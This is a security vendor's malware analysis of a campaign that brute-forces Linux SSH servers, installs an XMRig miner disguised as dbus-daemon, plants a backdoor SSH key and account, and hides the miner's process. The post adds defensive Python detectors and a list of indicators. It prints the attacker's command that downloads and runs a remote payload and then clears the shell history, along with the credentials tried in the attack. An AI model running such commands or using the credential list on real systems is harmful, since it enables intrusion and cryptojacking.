CoinMiner (KONO DIO DA) Distributed to Linux SSH Servers – ASEC BLOG

AhnLab Security Emergency response Center (ASEC) has recently discovered XMRig CoinMiner being installed on poorly managed Linux SSH servers. The attacks have been happening with a distinct pattern since 2022: they involve the usage of malware developed with Shell Script Compiler (SHC) when installing the XMRig, as well as the creation of a backdoor SSH account.

Most attacks against poorly managed Linux SSH servers end with the installation of a DDoS bot or a CoinMiner. DDoS bots have been covered on the ASEC Blog before, in the cases where ShellBot [1] and ChinaZ DDoS Bot [2] were installed, and the installation of XMRig CoinMiner was covered together with SHC malware [3].

This post covers one of the many attack cases in which a CoinMiner is installed. The distinguishing features of this campaign are its relatively recent start, its use of SHC, and the threat actor's personalized message, “KONO DIO DA”, embedded in the malware.

Figure 1. Message from the malware creator

1. Dictionary Attack Against Linux SSH Servers

Poorly managed services are among the most common attack vectors against server environments such as Linux servers. The Secure Shell (SSH) service is installed on most Linux servers, is easy to abuse, and is frequently left poorly managed. SSH lets administrators log in remotely and control the system, but they must authenticate as a user account registered on that system to do so.

If a Linux system uses weak account credentials (ID/PW), a threat actor can log in by brute force or a dictionary attack and then execute arbitrary commands. In attacks on poorly managed Linux SSH servers, the usual method is to locate externally exposed SSH servers by port scanning, log in through a dictionary attack using well-known credentials, and then download malware.

The following is a list of IDs/PWs used in those attacks.

ID     | PW         | Attacker
root   | .          | 23.224.232[.]68
root   | (blank)    | 23.224.232[.]68
root   | P@ssw0rd   | 23.224.232[.]68
admin  | password1! | 23.224.232[.]68
web    | 123456     | 23.224.232[.]68
tomcat | tomcat     | 23.224.232[.]68
centos | Huawei@123 | 23.224.232[.]68
oracle | Huawei@123 | 23.224.232[.]68
Table 1. Attack sources and account credentials used for the “KONO DIO DA” attacks
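As an added example (not part of the original ASEC post), the Python below shows how the dictionary attack described above looks in sshd's auth.log and how to pick it out: it groups authentication events by source address, counts distinct usernames tried, and, most importantly, flags a successful login that follows a burst of failures from the same source, which is the compromise itself rather than just noise. The log lines are constructed for this example; the source address and the root/web/tomcat/oracle usernames mirror Table 1, while the host name, timestamps, port numbers and the second source are invented.

```python
import re
from collections import defaultdict

# Constructed sample in OpenSSH auth.log format (not taken from the ASEC post).
# The source address and the usernames mirror Table 1; everything else is invented.
SAMPLE_AUTH_LOG = """\
Apr 24 10:01:02 srv sshd[1201]: Failed password for root from 23.224.232.68 port 51234 ssh2
Apr 24 10:01:04 srv sshd[1202]: Failed password for root from 23.224.232.68 port 51236 ssh2
Apr 24 10:01:06 srv sshd[1203]: Failed password for invalid user web from 23.224.232.68 port 51240 ssh2
Apr 24 10:01:08 srv sshd[1204]: Failed password for invalid user tomcat from 23.224.232.68 port 51244 ssh2
Apr 24 10:01:10 srv sshd[1205]: Failed password for invalid user oracle from 23.224.232.68 port 51248 ssh2
Apr 24 10:01:12 srv sshd[1206]: Accepted password for root from 23.224.232.68 port 51252 ssh2
Apr 24 10:05:00 srv sshd[1300]: Accepted publickey for alice from 10.0.0.5 port 40000 ssh2: ED25519 SHA256:c0ffee
Apr 24 10:06:30 srv sshd[1301]: Failed password for alice from 10.0.0.5 port 40002 ssh2
Apr 24 10:06:40 srv sshd[1302]: Accepted password for alice from 10.0.0.5 port 40004 ssh2
"""

# Matches "Failed password for root from ..." as well as sshd's wording for
# unknown accounts, "Failed password for invalid user web from ...".
AUTH_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Accepted|Failed) (?P<method>\w+) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)


def analyze_auth_log(log_text, fail_threshold=5, min_users=3):
    """Group sshd authentication events by source IP and report sources that
    exceeded `fail_threshold` failures, tried at least `min_users` distinct
    usernames (dictionary behaviour), or logged in successfully right after a
    burst of failures (the actual compromise).

    Returns {ip: {"failures", "users", "dictionary_like", "success_after_failures"}}
    for flagged sources only; success_after_failures lists (user, method) pairs.
    """
    stats = defaultdict(lambda: {"failures": 0, "users": set(), "success_after_failures": []})
    for line in log_text.splitlines():
        m = AUTH_RE.search(line)
        if not m:
            continue
        entry = stats[m["ip"]]
        if m["result"] == "Failed":
            entry["failures"] += 1
            entry["users"].add(m["user"])
        elif entry["failures"] >= fail_threshold:
            # A success from a source that was already failing is the event to page on.
            entry["success_after_failures"].append((m["user"], m["method"]))

    findings = {}
    for ip, e in stats.items():
        dictionary_like = len(e["users"]) >= min_users
        if e["failures"] >= fail_threshold or dictionary_like or e["success_after_failures"]:
            findings[ip] = {
                "failures": e["failures"],
                "users": sorted(e["users"]),
                "dictionary_like": dictionary_like,
                "success_after_failures": e["success_after_failures"],
            }
    return findings


if __name__ == "__main__":
    for ip, finding in analyze_auth_log(SAMPLE_AUTH_LOG).items():
        print(ip, finding)
```

On the sample, only 23.224.232.68 is reported: five failures across four usernames, followed by an accepted password login as root. The single failed attempt by alice from 10.0.0.5 stays below both thresholds, so her later success is not reported. Tune `fail_threshold` downwards for hosts where password authentication is supposed to be disabled entirely.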

2. Cases of KONO DIO DA Attacks – Latest

Figure 2. Latest attack flow

After logging in successfully, the threat actor ran the commands below to download and execute the malware. “uname -a” and “nproc” print system information: the kernel version and architecture, and the number of available processor cores, which determines how much mining throughput the host can deliver. These are presumably used so the threat actor can later tell which systems have had a CoinMiner installed. The trailing commands clear the shell history once the malware has run.

# uname -a;nproc; wget -q 46.41.150[.]129/.bo/am ; chmod +x am ; ./am ; history -c ; rm -rf ~/.bash_history

The downloaded “am” file is malware built with SHC that functions as a downloader. Being built with SHC means the original malware is a Bash script that has been converted into an ELF binary. SHC was covered in detail in the earlier post referenced above [3].

Figure 3. Decrypted Bash script

“am” is a simple downloader that downloads and executes “nw”, and “nw” is itself a downloader that ultimately fetches and runs the additional malware. The “nw” Bash script first kills and deletes the CoinMiner and other malware from the threat actor's earlier attacks, then downloads and executes a compressed file containing XMRig and Bash script malware.

Figure 4. Main routine of nw Bash script

The compressed file contains the XMRig binary, named “dbus-daemon --system --address=systemd_ --nofork --nopidfile --systemd-activation --syslog-only”, the configuration file “config.json”, and three Bash script malware files.

Figure 5. XMRig and Bash malware contained inside the compressed file

“nw” executes the “start” Bash script from the compressed file, and “start” in turn executes the “admin” Bash script. “admin” registers a cron task that runs the “root.sh” Bash script every minute.

Figure 6. Registered cron task, “nano.backup”

“root.sh” executes the XMRig binary “dbus-daemon --system --address=systemd_ --nofork --nopidfile --systemd-activation --syslog-only” located in the same directory, which reads the mining configuration it needs from the “config.json” file in that same directory. XMRig thus runs under the name of a legitimate process, “dbus-daemon”, and not only the process name but also the command-line arguments of the real daemon are mimicked, so an ordinary look at the process list does not reveal that a CoinMiner is running.
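The masquerade works because ps prints the file name, and here the file name already contains the daemon's arguments. Two things still give the miner away: /proc/&lt;pid&gt;/exe points into a scratch or hidden directory rather than /usr/bin/dbus-daemon, and /proc/&lt;pid&gt;/cmdline holds a single argv[0] with embedded spaces instead of seven NUL-separated arguments, because the oddly named binary was started without arguments of its own. The Python below is an added example, not code from the post or the actor; it checks both signals, and also lists every-minute crontab entries that reference such directories, which is how root.sh is kept running. The allowlist of expected binary paths, the sample process records and the sample crontab are constructed for the example; the exact cron line the actor uses is not given in the post.

```python
import os
import re

# Where impersonated daemons legitimately live. Constructed allowlist for this
# example (not from the ASEC post); extend it per distribution.
EXPECTED_EXE = {"dbus-daemon": {"/usr/bin/dbus-daemon"}}

# Scratch and hidden directories a system daemon has no business running from.
SCRATCH_OR_HIDDEN = re.compile(
    r"(?:^|\s)(?:/tmp|/var/tmp|/dev/shm)(?:/|\s|$)|/\.[^/\s]+(?:/|\s|$)"
)

# Constructed process records: (readlink of /proc/<pid>/exe, raw /proc/<pid>/cmdline).
SAMPLE_LEGIT_DBUS = (
    "/usr/bin/dbus-daemon",
    "/usr/bin/dbus-daemon\0--system\0--address=systemd:\0--nofork\0--nopidfile\0"
    "--systemd-activation\0--syslog-only\0",
)
SAMPLE_MINER = (
    "/tmp/.x/dbus-daemon --system --address=systemd_ --nofork --nopidfile "
    "--systemd-activation --syslog-only",
    "./dbus-daemon --system --address=systemd_ --nofork --nopidfile "
    "--systemd-activation --syslog-only\0",
)
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
* * * * * /var/tmp/.x/root.sh >/dev/null 2>&1
*/5 * * * * /usr/local/bin/sync.sh
"""

EVERY_MINUTE = re.compile(r"^\*\s+\*\s+\*\s+\*\s+\*\s+(?P<cmd>.+)$")


def check_process(exe, cmdline):
    """Return the reasons a process looks like a miner masquerading as a daemon.
    exe: readlink('/proc/<pid>/exe'), '' if unreadable, ends in ' (deleted)' if unlinked;
    cmdline: contents of /proc/<pid>/cmdline (NUL-separated argv)."""
    reasons = []
    argv = [a for a in cmdline.split("\0") if a]
    argv0 = argv[0] if argv else ""
    real_exe = exe.replace(" (deleted)", "")

    # ps shows "dbus-daemon --system ..." for both, but for the miner that whole
    # string is one argv[0]: the file itself is named that way and was run bare.
    if len(argv) == 1 and " " in argv0:
        reasons.append("entire command line is a single argv[0]; arguments are baked into the file name")

    shown_name = os.path.basename(argv0.split(" ")[0])
    expected = EXPECTED_EXE.get(shown_name)
    if expected is not None and real_exe and real_exe not in expected:
        reasons.append(f"presents as {shown_name} but runs from {real_exe}")

    if SCRATCH_OR_HIDDEN.search(real_exe):
        reasons.append(f"executable lives in a scratch or hidden directory: {real_exe}")
    if exe.endswith(" (deleted)"):
        reasons.append("executable was deleted from disk after launch")
    return reasons


def check_crontab(text):
    """Return (line, suspicious_path) for each user-crontab entry that runs every
    minute; suspicious_path is True when the command references a scratch or hidden
    directory, which is how the post's root.sh job is wired up."""
    hits = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = EVERY_MINUTE.match(line)
        if m:
            hits.append((line, bool(SCRATCH_OR_HIDDEN.search(m["cmd"]))))
    return hits


def scan_live_processes():
    """Apply check_process to every PID on this host; returns {pid: reasons}.
    Run as root, otherwise exe links of other users' processes are unreadable."""
    flagged = {}
    for name in os.listdir("/proc"):
        if not name.isdigit():
            continue
        try:
            exe = os.readlink(f"/proc/{name}/exe")
        except OSError:
            exe = ""  # kernel thread, or not permitted
        try:
            with open(f"/proc/{name}/cmdline", "rb") as fh:
                cmdline = fh.read().decode("utf-8", "replace")
        except OSError:
            continue  # process exited mid-scan
        reasons = check_process(exe, cmdline)
        if reasons:
            flagged[int(name)] = reasons
    return flagged


if __name__ == "__main__":
    print("legit:", check_process(*SAMPLE_LEGIT_DBUS))
    print("miner:", check_process(*SAMPLE_MINER))
    print("cron :", check_crontab(SAMPLE_CRONTAB))
```

The exe check is the robust one: a renamed binary cannot change where the kernel says it was loaded from, and a miner that deletes itself after start still shows up as “(deleted)”. The argv[0] heuristic is specific to this actor's trick of baking arguments into the file name and would not fire on a binary copied to a plain “dbus-daemon” name and launched with real arguments.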

Mining Pool | Wallet | Password
xmr.doi-2020[.]net:14444 | 85myxAJXqM1i9RLd1b7xq4JddqUTt1fD9ikYNNfwgtZPh42Cm5PSRMQW9R7Sue28TS86bWRkiw3MV8K4ZRGaMw6ZVLLLbMQ.worker01/bolus.eu@gmail.com | worker01
val.doi-2020[.]net:80 | 87FWpUCibvHQPvqhjyKg6n18yDpLHh96cVMxtPW1WWEhbePvK5LrDhE5sYgHEpRuU1RkJ5VZ8mBxJ3RbGMe2WXeC1x9TNrF | x
142.202.242[.]45:80 | 87FWpUCibvHQPvqhjyKg6n18yDpLHh96cVMxtPW1WWEhbePvK5LrDhE5sYgHEpRuU1RkJ5VZ8mBxJ3RbGMe2WXeC1x9TNrF | x
pool.hashvault[.]pro:80 | 87FWpUCibvHQPvqhjyKg6n18yDpLHh96cVMxtPW1WWEhbePvK5LrDhE5sYgHEpRuU1RkJ5VZ8mBxJ3RbGMe2WXeC1x9TNrF | x
AS.doi-2020[.]net:80 | 85myxAJXqM1i9RLd1b7xq4JddqUTt1fD9ikYNNfwgtZPh42Cm5PSRMQW9R7Sue28TS86bWRkiw3MV8K4ZRGaMw6ZVLLLbMQ | x
139.99.123[.]196:80 | 85myxAJXqM1i9RLd1b7xq4JddqUTt1fD9ikYNNfwgtZPh42Cm5PSRMQW9R7Sue28TS86bWRkiw3MV8K4ZRGaMw6ZVLLLbMQ | x
pool.supportxmr[.]com:80 | 87FWpUCibvHQPvqhjyKg6n18yDpLHh96cVMxtPW1WWEhbePvK5LrDhE5sYgHEpRuU1RkJ5VZ8mBxJ3RbGMe2WXeC1x9TNrF | x
Table 2. Threat actor’s XMRig mining information

Figure 7. Monero coin mining packet

3. Cases of KONO DIO DA Attacks – Past

Figure 8. Past attack flow

Compared with these past cases, the malware used in the recent attacks has fewer features. The initially installed file could not be confirmed, but “hoze” is a Bash script that plays the same role as “nw”: it decompresses the downloaded compressed file and executes an ELF file named “init0”. “init0” is a malware strain that provides various additional features, including installing the XMRig CoinMiner.

Unlike in the recently confirmed attacks, the “KONO DIO DA” threat actor used a wider variety of features in their past attacks, persistence being the main one. The compressed file contained a “key” file.

Figure 9. Malware inside the compressed file used in past attacks

The “key” file contained the following public SSH key. “init0” removes the existing “~/.ssh/authorized_keys” file and copies the “key” file from the compressed file into that location.

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCh047MLLA8ul64R+zVcEezUGtPUhnB+6mSzXoikFgju2orDUBX4K1ve/SW2pMQeQf9ErQojugX43N0iJYtuZUCgtH3A3oLV7zlhbkMuxjfgoUEovBXlAe9sXtLPnbYE999hT0M+OVv2l5/dDgiXs3eG9/BtcuPBEQ4lnH2YdFkckUJmrQQctA1ItFGTNB9fiFu44bH7JjRxSPt97PJPjeEcbEMdJyx4y827NpogeL2QSCfj7II9XdfgaarEOeEF9abY6+1RqDhElhz4ZSQTfoSkl8/8LyBXun7ybdVYxxJdxGznDpNBHyYEcKZFRy9q4mTHBeXMlWiGimSpE7dyhuT rsa-key

An SSH server can authenticate a user without an ID and password when the user has generated a public/private key pair and registered the public key on the server; from then on the private key alone is enough to log in. Here the threat actor registers their own public key, the “key” file, as “~/.ssh/authorized_keys” on the infected system, which lets them log in later with the matching private key regardless of any subsequent password change.

In addition, the threat actor adds an account named “cheeki” using the usermod command. If the infected system has an account named “root”, “dolphinscheduler”, “admin”, “es”, or “hadoop”, the threat actor changes its password. This is a persistence technique that leaves a backdoor account on the infected system so the threat actor can log in again later.

Figure 10. Routine used to maintain persistence
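The two persistence mechanisms above, the replaced authorized_keys file and the added or re-passworded accounts, can be audited offline from copies of the relevant files. The Python below is an added example, not the post's or the actor's code. It parses authorized_keys entries, checks that the type string embedded in the base64 blob matches the declared type, computes OpenSSH-style SHA256 fingerprints and compares them to an allowlist, reporting both unexpected keys and allowlisted keys that have vanished (init0 deletes the whole file, so both fire); and it reads the last-change field of /etc/shadow to list accounts whose password was set on or after a given date. The actor's key is the public key printed above; the admin key is synthetic (a well-formed ssh-ed25519 blob with dummy key bytes, not a usable key), and the shadow entries are constructed.

```python
import base64
import datetime
import hashlib
import re
import struct

# The threat actor's public key as printed in the post (contents of the "key" file).
ACTOR_KEY_LINE = (
    "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCh047MLLA8ul64R+zVcEezUGtPUhnB+6mSzXoikFgju2orDUBX4K1ve/SW2pMQeQf9ErQojugX43N0iJYtuZUCgtH3A3oLV7zlhbkMuxjfgoUEovBXlAe9sXtLPnbYE999hT0M+OVv2l5/dDgiXs3eG9/BtcuPBEQ4lnH2YdFkckUJmrQQctA1ItFGTNB9fiFu44bH7JjRxSPt97PJPjeEcbEMdJyx4y827NpogeL2QSCfj7II9XdfgaarEOeEF9abY6+1RqDhElhz4ZSQTfoSkl8/8LyBXun7ybdVYxxJdxGznDpNBHyYEcKZFRy9q4mTHBeXMlWiGimSpE7dyhuT rsa-key"
)
# Synthetic admin key: a well-formed ssh-ed25519 blob with dummy key bytes, so it
# parses and fingerprints like a real key but cannot be used to log in anywhere.
SYNTHETIC_ADMIN_BLOB = b"\x00\x00\x00\x0bssh-ed25519\x00\x00\x00\x20" + bytes(range(32))
SYNTHETIC_ADMIN_LINE = "ssh-ed25519 " + base64.b64encode(SYNTHETIC_ADMIN_BLOB).decode() + " admin@bastion"

# ~/.ssh/authorized_keys as init0 leaves it: only the actor's key remains.
INFECTED_AUTHORIZED_KEYS = ACTOR_KEY_LINE + "\n"

# Constructed /etc/shadow excerpt. Field 3 is the last password change in days since
# 1970-01-01: 19471 is 2023-04-24, 19000 is 2022-01-08.
SAMPLE_SHADOW = """\
root:$6$c0nstructed$hash:19471:0:99999:7:::
daemon:*:18000:0:99999:7:::
alice:$6$c0nstructed$hash:19000:0:99999:7:::
hadoop:$6$c0nstructed$hash:19471:0:99999:7:::
cheeki:$6$c0nstructed$hash:19471:0:99999:7:::
"""

KEY_RE = re.compile(
    r"(?P<type>ssh-(?:rsa|ed25519|dss)|ecdsa-sha2-nistp\d{3})\s+"
    r"(?P<b64>[A-Za-z0-9+/=]+)(?:\s+(?P<comment>\S.*))?$"
)


def fingerprint(blob):
    """OpenSSH-style SHA256 fingerprint of a raw key blob (unpadded base64)."""
    return "SHA256:" + base64.b64encode(hashlib.sha256(blob).digest()).decode().rstrip("=")


def parse_authorized_keys(text):
    """Parse authorized_keys lines. A key is 'malformed' when the blob cannot be
    decoded or the type string embedded in it differs from the declared type."""
    keys = []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = KEY_RE.search(line)  # search(): a leading options field (command="...") is skipped
        if not m:
            keys.append({"line": lineno, "type": None, "comment": line, "fingerprint": "", "malformed": True})
            continue
        b64 = m["b64"].rstrip("=")
        try:
            blob = base64.b64decode(b64 + "=" * (-len(b64) % 4))
            (n,) = struct.unpack(">I", blob[:4])  # blob starts with length-prefixed type string
            embedded = blob[4:4 + n].decode("ascii")
        except (ValueError, struct.error):
            blob, embedded = b"", ""
        keys.append({"line": lineno, "type": m["type"], "comment": m["comment"] or "",
                     "fingerprint": fingerprint(blob) if blob else "",
                     "malformed": embedded != m["type"]})
    return keys


def audit_authorized_keys(text, allowed_fingerprints):
    """Return (unexpected_keys, missing_fingerprints): keys not on the allowlist, and
    allowlisted keys no longer present in the file."""
    keys = parse_authorized_keys(text)
    unexpected = [k for k in keys if k["malformed"] or k["fingerprint"] not in allowed_fingerprints]
    missing = sorted(set(allowed_fingerprints) - {k["fingerprint"] for k in keys})
    return unexpected, missing


def password_changes_since(shadow_text, since_iso):
    """Accounts with a usable hash whose password was set on or after since_iso (YYYY-MM-DD)."""
    since = datetime.date.fromisoformat(since_iso)
    epoch = datetime.date(1970, 1, 1)
    hits = []
    for line in shadow_text.splitlines():
        parts = line.split(":")
        if len(parts) < 3 or not parts[2].isdigit() or parts[1][:1] in ("", "!", "*"):
            continue  # locked or passwordless accounts cannot serve as the backdoor
        changed = epoch + datetime.timedelta(days=int(parts[2]))
        if changed >= since:
            hits.append((parts[0], changed.isoformat()))
    return hits


ADMIN_FINGERPRINT = fingerprint(SYNTHETIC_ADMIN_BLOB)

if __name__ == "__main__":
    unexpected, missing = audit_authorized_keys(INFECTED_AUTHORIZED_KEYS, {ADMIN_FINGERPRINT})
    for k in unexpected:
        print("unexpected key:", k["type"], k["fingerprint"], k["comment"])
    print("allowlisted keys missing:", missing)
    print("recent password changes:", password_changes_since(SAMPLE_SHADOW, "2023-04-01"))
```

The fingerprint produced here is the same value `ssh-keygen -lf` prints, so the allowlist can be built from existing key inventories. The shadow check needs a baseline date (a known-good snapshot or the last legitimate password rotation); on the sample it returns root, hadoop and cheeki, which matches the post's list of accounts the actor re-passwords plus the account it adds.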

The “uninstall.sh” Bash script removes Alibaba Cloud's security agent, Cloud Shield (Aegis, also called Ann Knight). Such uninstall routines are best known from Kinsing, a malware strain whose installer Bash script removes not only Aegis but Tencent QCloud Monitor as well, and also disables SELinux and AppArmor.

Figure 11. Routine to remove Aegis

Contrary to its name, “init.sh” is an SHC-built ELF file with the simple structure shown below. It executes the CoinMiner and hides its process: it creates the “/var/tmp/…” directory and uses the mount command to bind-mount that directory over the miner's PID directory in the /proc file system, so tools such as ps that read /proc no longer see the process. This is a previously known process-concealment method; the threat actor uses this one command instead of a rootkit to hide the CoinMiner's process.

Figure 12. Command to hide the PID of the miner
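Two ways to find a process hidden with this trick, as an added example that is not from the post. A bind mount over /proc/&lt;pid&gt; is itself recorded in the mount table: /proc/self/mountinfo gains a line whose mount point is a /proc/&lt;pid&gt; directory and whose root field is the directory that was bound over it. Independently of the mount table, readdir on /proc still lists the PID, but /proc/&lt;pid&gt;/status is no longer there, while kill(pid, 0) confirms the process exists. The mountinfo excerpt below is constructed; the three-dot directory name and the PID are assumptions made for the example.

```python
import os
import re

# Constructed /proc/self/mountinfo excerpt (not from the ASEC post). The last line is
# what "mount --bind /var/tmp/... /proc/2765" leaves behind: a bind mount whose mount
# point is the miner's /proc/<PID> directory and whose root field is the bound directory.
# The three-dot directory name and the PID are assumptions for this example.
SAMPLE_MOUNTINFO = """\
24 30 0:22 / /proc rw,nosuid,nodev,noexec,relatime shared:13 - proc proc rw
30 1 8:1 / / rw,relatime shared:1 - ext4 /dev/sda1 rw,errors=remount-ro
120 24 8:1 /var/tmp/... /proc/2765 rw,relatime shared:1 - ext4 /dev/sda1 rw,errors=remount-ro
"""

PROC_PID_DIR = re.compile(r"^/proc/(\d+)/?$")


def overmounted_pids(mountinfo_text):
    """Return {pid: (fstype, bound_path)} for every mount whose mount point is a
    /proc/<PID> directory. mountinfo fields are:
    id parent maj:min root mount_point opts [optional...] - fstype source superopts"""
    hidden = {}
    for line in mountinfo_text.splitlines():
        fields = line.split()
        if "-" not in fields or len(fields) < 10:
            continue
        m = PROC_PID_DIR.match(fields[4])
        if not m:
            continue
        sep = fields.index("-")
        hidden[int(m.group(1))] = (fields[sep + 1], fields[3])
    return hidden


def live_overmounted_pids():
    """Run the mount-table check against this host."""
    with open("/proc/self/mountinfo") as fh:
        return overmounted_pids(fh.read())


def live_masked_pids():
    """Mount-table-independent check: a numeric /proc entry with no status file while
    kill(pid, 0) says the process exists. ps skips such PIDs because /proc/<pid>/stat
    is hidden by the overmount, but readdir on /proc still lists the directory."""
    masked = []
    for name in os.listdir("/proc"):
        if not name.isdigit() or os.path.exists(f"/proc/{name}/status"):
            continue
        try:
            os.kill(int(name), 0)
        except ProcessLookupError:
            continue  # exited between listdir and kill
        except PermissionError:
            pass  # alive, owned by another user
        masked.append(int(name))
    return masked


if __name__ == "__main__":
    print("from sample mountinfo:", overmounted_pids(SAMPLE_MOUNTINFO))
    if os.path.exists("/proc/self/mountinfo"):
        print("on this host:", live_overmounted_pids(), live_masked_pids())
```

Once a PID is found, `umount /proc/<pid>` removes the overlay and the process reappears in ps; the bound directory's path from the root field (here the “/var/tmp” location) is where to look for the miner's files. Because the mount table is read from /proc/self/mountinfo, the actor would have to hide that file as well to defeat the first check, which a bind mount on a single PID directory does not do.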

The scripts and SHC ELF files described so far play supporting roles; “secure” carries the main functionality. “secure” is an ELF file built with SHC that executes the XMRig CoinMiner, installs the latest XMRig, and registers itself as a cron task. Because cron runs it regularly, if XMRig is missing from the system the latest version is downloaded and mining on the infected system resumes.

Figure 13. Main routine of “secure”

As noted above, most attacks against poorly managed Linux SSH servers install a DDoS bot or a CoinMiner, and most CoinMiner cases have no notable characteristics: XMRig is simply installed to mine Monero. The “KONO DIO DA” threat actor, however, deploys additional malware and several analysis-disruption techniques alongside XMRig, and these attacks were confirmed relatively recently.

Mining Pool | Wallet | Password
5.9.157[.]2:10380 | TRTLv1M57YFZjutXRds3cNd6iRurtebcy6HxQ6hRMCzGF5nE4sWuqCCX9vamnUcG35BkQy6VfwUy5CsV9YNomioPGGyVhKTze3C | x
2.58.149[.]237:2007 | TRTLv1M57YFZjutXRds3cNd6iRurtebcy6HxQ6hRMCzGF5nE4sWuqCCX9vamnUcG35BkQy6VfwUy5CsV9YNomioPGGyVhKTze3C | x
Table 3. Threat actor’s XMRig mining information – Past

4. Conclusion

Attack campaigns that install a CoinMiner on poorly managed Linux SSH servers have been occurring continuously for years. The “KONO DIO DA” campaign covered here maintains persistence by registering a backdoor SSH account in addition to installing the XMRig CoinMiner. Once a CoinMiner is installed, system resources are spent mining Monero for the threat actor, who can later log in through the backdoor SSH account to install additional malware, steal information from the system, or perform other malicious actions.

Administrators should therefore use passwords that are hard to guess and change them periodically to protect Linux servers from brute force and dictionary attacks, and apply the latest patches to prevent exploitation of vulnerabilities. Servers reachable from outside should also be protected with security products such as firewalls to restrict attacker access. Finally, V3 should be updated to the latest version to block malware infections in advance.
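The advice above maps onto a handful of sshd_config directives. The Python below, an added example rather than anything from the post, audits a configuration the way sshd itself reads it: the first occurrence of a directive wins, directives absent from the file are evaluated at OpenSSH's documented defaults, and parsing stops at the first Match block. A weak configuration of the kind this campaign relies on is shown beside its hardened form; both are constructed, and the account names in AllowUsers are placeholders.

```python
import re

# A weak sshd_config of the kind that lets the dictionary attack in this post succeed,
# beside a hardened version. Both are constructed for this example (not from the post);
# the AllowUsers names are placeholders.
WEAK_SSHD_CONFIG = """\
Port 22
PermitRootLogin yes
PasswordAuthentication yes
"""

HARDENED_SSHD_CONFIG = """\
Port 22
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
MaxAuthTries 3
AllowUsers alice deploy
"""

# directive -> (OpenSSH default when absent, acceptable values or predicate, why it matters)
CHECKS = {
    "permitrootlogin": ("prohibit-password", {"no", "prohibit-password"},
                        "root is the first account a dictionary attack tries"),
    "passwordauthentication": ("yes", {"no"},
                               "password logins are exactly what the attack needs"),
    "permitemptypasswords": ("no", {"no"},
                             "Table 1 includes a blank password"),
    "pubkeyauthentication": ("yes", {"yes"},
                             "key login must stay on once passwords are off"),
    "maxauthtries": ("6", lambda v: v.isdigit() and int(v) <= 3,
                     "more guesses per connection before sshd disconnects"),
}


def parse_sshd_config(text):
    """Map lower-cased directive -> value. As in sshd, the first occurrence wins and
    keyword and value may be separated by whitespace or '='. Parsing stops at the
    first Match block because values inside it apply only conditionally."""
    conf = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)
        key = parts[0].lower()
        if key == "match":
            break
        if len(parts) == 2:
            conf.setdefault(key, parts[1].strip())
    return conf


def audit_sshd_config(text):
    """Return [(directive, effective value, reason)] for weak settings, evaluating
    absent directives at their OpenSSH default."""
    conf = parse_sshd_config(text)
    findings = []
    for key, (default, acceptable, why) in CHECKS.items():
        value = conf.get(key, default)
        ok = acceptable(value) if callable(acceptable) else value.lower() in acceptable
        if not ok:
            findings.append((key, value, why))
    if "allowusers" not in conf and "allowgroups" not in conf:
        findings.append(("allowusers", "(absent)",
                         "no account allowlist: service accounts such as tomcat or oracle stay reachable"))
    return findings


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_SSHD_CONFIG), ("hardened", HARDENED_SSHD_CONFIG)):
        print(name, audit_sshd_config(cfg) or "no findings")
```

The weak file produces four findings (root login, password authentication, the default of six tries per connection, and no account allowlist); the hardened file produces none. Turning password authentication off only helps if every legitimate user already has a key registered, so run the audit after the key rollout, not before. Include files and Match blocks are deliberately not followed here; for a production check, feed the script the output of `sshd -T`, which prints the fully resolved effective configuration.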

File Detection
– CoinMiner/Text.Config (2023.04.24.02)
– Downloader/Linux.Agent.1011056 (2023.04.24.02)
– Downloader/Linux.Agent.11344 (2023.04.24.02)
– Downloader/Shell.Agent.SC187868 (2023.04.24.02)
– Downloader/Shell.Agent.SC187872 (2023.04.24.02)
– Linux/CoinMiner.Gen2 (2019.07.31.08)
– Trojan/Linux.Agent.1010416 (2023.04.24.02)
– Trojan/Linux.Hider.1008280 (2023.04.24.02)
– Trojan/Shell.Agent.SC187867 (2023.04.24.02)
– Trojan/Shell.Agent.SC187876 (2023.04.24.02)
– Trojan/Shell.Runner.SC187869 (2023.04.24.02)
– Trojan/Shell.Runner.SC187871 (2023.04.24.02)

IOC
MD5
– ea30afd4f65f8866bebcaf92168f3241: Latest version of the downloader (am)
– 1192697ed3d2302bec3ee828c154e300: Latest version of the downloader Bash script (nw)
– 1db93cb95e409769561efb66e4fd5c72: Bash script (start)
– 6e9001516053770f6dd645954240bced: Bash script (admin)
– a978aec11a072855e2cfba593160886e: Bash script (root.sh)
– 4f1661d873cef8a3fa3ca34080816e87: XMRig CoinMiner (dbus-daemon --system --address=systemd_ --nofork --nopidfile --systemd-activation --syslog-only)
– 20ac8a45d129e3ce3444494d9672692c: XMRig Configuration File (config.json)
– 5c1ad4a8335fc406040a070b2be661ff: Past version of the downloader Bash script (hoze)
– 90948ae9f7d167d4016c7a56477a67b3: Past version of the downloader (init0)
– 1932d2e4081f6dd5c8b32d29b1ab5caf: Bash script (init.sh)
– e4cc1a7f992909e8509520fdd6c9a3f7: Bash script (uninstall.sh)
– bb497b86c26893e10432781c6550e5fc: Bash script (secure)
– 254784ca05bdd3928d7889d0ea3195ab: XMRig CoinMiner (xri)
– 5f89f90efd1568618e72bb30b8e44fce: XMRig Configuration File (config.json)
– 5aa60757665510b2c8e9bb924c2b40ef: XMRig Configuration File (config32.json)

Download URLs
– hxxp://46.41.150[.]129/.bo/am: Latest version of the downloader (am), fetched right after the dictionary attack
– hxxp://46.41.150[.]129/.bo/nw: Latest version of the downloader Bash script (nw), downloaded by am
– hxxp://46.41.150[.]129/.js/new-xmrig.tgz: Compressed file containing XMRig and the Bash scripts, downloaded by nw
– hxxp://2.58.149[.]237:6972/hoze: Past version of the downloader Bash script (hoze)
– hxxp://2.58.149[.]237:6972/xri2.tar: Past version of the compressed file containing the CoinMiner, downloaded by hoze
– hxxp://141.95.19[.]91:8080/xri/xri: Downloads XMRig CoinMiner
